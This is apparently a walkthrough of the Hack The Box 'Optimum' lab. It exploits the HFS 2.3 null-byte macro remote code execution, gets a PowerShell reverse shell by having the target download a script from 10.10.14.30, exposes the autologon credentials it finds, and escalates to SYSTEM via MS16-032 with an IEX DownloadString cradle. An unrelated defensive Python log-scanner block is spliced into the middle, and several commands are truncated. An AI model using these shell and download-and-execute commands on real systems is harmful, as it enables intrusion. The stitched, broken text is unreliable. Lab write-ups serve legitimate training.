Optimum – No Metasploit

Let's power up nmap and see what we find:

PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 127 HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).

Okay. Let's browse to 10.10.10.8:

[Screenshot: the HFS web interface at http://10.10.10.8/ shows "No files in this folder" (0 folders, 0 files, 0 bytes). The Server information panel at the bottom left reads: HttpFileServer 2.3, Server time: 3/6/2020, Server uptime: 10:37:37]

Look at the bottom left: the server information panel gives us HttpFileServer 2.3.

Let’s poke around on SearchSploit:

searchsploit hfs

 Exploit Title                                                             | Path (/usr/share/exploitdb/)
---------------------------------------------------------------------------|----------------------------------
Apple Mac OSX 10.4.8 - NFS/HFS+ DO_TRUNCATE Denial of Service              | exploits/osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                    | exploits/osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                | exploits/osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation         | exploits/osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                 | exploits/windows/remote/37985.py
Linux Kernel 2.6.x SquashFS Double-Free Denial of Service                  | exploits/linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)     | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities          | exploits/windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload             | exploits/multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution            | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution            | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution   | exploits/windows/webapps/34852.txt

RCE always looks fun. Let’s look at that one… specifically the .txt file:

issue exists due to a poor regex in the file ParserLib.pas

    function findMacroMarker(s:string; [...]
    begin result:=[...], ofs) end;

it will not handle null byte so a request to

    http://localhost:[...]%00{.exec|cmd.}

will stop regex from parse macro, and macro will be executed and remote code injection happen.

EDB Note: This vulnerability will run the payload multiple times simultaneously. Make sure to take this into consideration when crafting your payload (and/or listener).

So basically we need to send a null byte followed by {.exec|cmd.}, where cmd is whatever command we want. Let's use Burp to try this out. It took me a while to figure this out and I actually had to watch IppSec's video, but in it he explains the importance of SysNative vs. SysWOW64 vs. System32.
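A defender-side check for the request shape described above (a null byte in front of an HFS {.exec|...} macro). This is an added example, not code from the original post; it assumes CLF-style access-log lines as a reverse proxy in front of HFS would write them (constructed here), since HFS's own log format differs.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = """\
10.10.14.30 - - [27/May/2020:20:58:30 +0000] "GET /?search=%00{.exec|ping+10.10.14.30.} HTTP/1.1" 200 -
10.10.14.30 - - [27/May/2020:20:58:31 +0000] "GET /?search=report.pdf HTTP/1.1" 200 -
10.10.14.30 - - [27/May/2020:20:58:32 +0000] "GET /?search=%00%7B.exec%7Ccmd.exe%7D HTTP/1.1" 200 -
10.10.14.30 - - [27/May/2020:20:58:33 +0000] "GET /?search=%7B.exec%7Cwhoami.%7D HTTP/1.1" 200 -
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# HFS macro opener: "{." then a macro name, then the "|" argument separator.
MACRO_RE = re.compile(r'\{\.\s*(?P<macro>[a-z]+)\s*\|', re.IGNORECASE)

def decode_target(target, max_rounds=3):
    """URL-decode until the string stops changing, so double encoding is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_line(line):
    """Return a finding for a request carrying an HFS macro or a null byte, else None."""
    m = REQ_RE.search(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    has_null = "\x00" in decoded
    macro = MACRO_RE.search(decoded)
    if not macro and not has_null:
        return None
    # Null byte plus macro is exactly the shape the advisory above describes;
    # either one on its own is still worth a look.
    severity = "high" if (macro and has_null) else "medium"
    return {
        "severity": severity,
        "macro": macro.group("macro").lower() if macro else None,
        "null_byte": has_null,
        "target": m.group("target"),
    }

def scan_log(text):
    """Scan every line of a log; returns the findings in log order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]
```

Run `scan_log(SAMPLE_LOG)` to get the three flagged requests; the plain search for report.pdf is not reported.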

And in our ICMP dump we get:

20:58:30.657617 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 37
20:58:30.657649 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 37
20:58:30.703055 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 38
20:58:30.703087 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 38
20:58:30.706503 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 39
20:58:30.706526 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 39
20:58:30.707674 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 40
20:58:30.707698 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 40
20:58:31.674435 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 41
20:58:31.674469 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 41
20:58:31.721354 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 42
20:58:31.721401 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 42
20:58:31.721416 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 43
20:58:31.721419 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 43
20:58:31.721496 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 44
20:58:31.721501 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 44
20:58:32.690808 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 45
20:58:32.690842 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 45
20:58:32.736639 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 46
20:58:32.736673 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 46
20:58:32.736686 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 47
20:58:32.736688 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 47
20:58:32.736694 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 48
20:58:32.736696 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 48
20:58:33.706481 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 49
20:58:33.706515 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 49
20:58:33.752505 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 50
20:58:33.752539 hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 50
20:58:33.752550 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 51

So we have command execution! Now, let's copy Invoke-PowerShellTcp.ps1 to our working directory and append the example invocation from the script's own comments to the end of the file:

        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port

Serve it up on our box:

kali@hyd3:~/Documents/htb/optimum$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [27/May/2020 17:22:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 17:22:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 17:22:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 17:22:32] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 20:53:51] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 20:53:51] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

Now let's supply the correct argument in Burp, remembering to URL-encode it. Don't forget to set up your listener.

On our listener, we get a user shell:

kali@hyd3:~/Documents/htb/optimum$ rlwrap nc -nvlp
listening on [any] ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49282
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:

Looking around, we find some credentials that are pretty much useless at this point (but we keep enumerating anyway!):

DefaultDomainName
DefaultUserName        kostas
DefaultPassword        kdeEjDowkS*
AltDefaultDomainName
AltDefaultUserName
AltDefaultPassword

At this point, I ran Sherlock.ps1 to help me out a bit.

kali@hyd3:~/Documents/htb/optimum$ rlwrap nc -nvlp
listening on [any] ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49295
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C: ... http://10.10.14.30/winPEAS_64.exe -outfile winpeas64.exe
PS C: IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.30/Sherlock.ps1')

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Hmm. At first I tried using an off-the-shelf MS16-032.ps1 script, but those don't work because they spawn a new terminal window. We don't have visual access, so we can't use it. IppSec's video shows us that there's a copy in Empire that can be used from the CLI.

Testing it out:

PS C: Invoke-MS16-032
[by b33f @FuzzySec]
Operating system core count: 2
Duplicating CreateProcessWithLogonW handle
Done, using thread handle: 2472
Sniffing out privileged impersonation token..
Thread belongs to: svchost
Thread suspended
Wiping current impersonation token
Building SYSTEM impersonation token
Success, open SYSTEM token handle: 2468
Resuming thread..
Sniffing out SYSTEM shell..
Duplicating SYSTEM token
Starting token race
Starting process race
Holy handle leak Batman, we have a SYSTEM shell!!
PS C: whoami
optimum\kostas

The SYSTEM shell went to a window we can't see, so our own shell is still kostas. Instead we use the modified Invoke-MS16032 that accepts a command to run.

To use it you have to edit the bottom of the script to call the function with the command you want, as the script itself states:

        Return
    }

    $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
    $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
    $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
    $StartTokenRace.Stop()
    $SafeGuard.Stop()
}
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.30/rev4445.ps1')"

Create another reverse TCP script with a different port (I called mine rev4445.ps1).

Running it:

PS C: IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.30/Invoke-MS16032.ps1')
[by b33f @FuzzySec]
[!] Holy handle leak Batman, we have a SYSTEM shell!!
PS C:

And on our other listener, set up on port 4445, we get an NT AUTHORITY\SYSTEM shell:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.8/scans$ rlwrap nc -nvlp 4445
listening on [any] 4445 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49325
Windows PowerShell running as user SYSTEM on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:
nt authority\system
PS C:
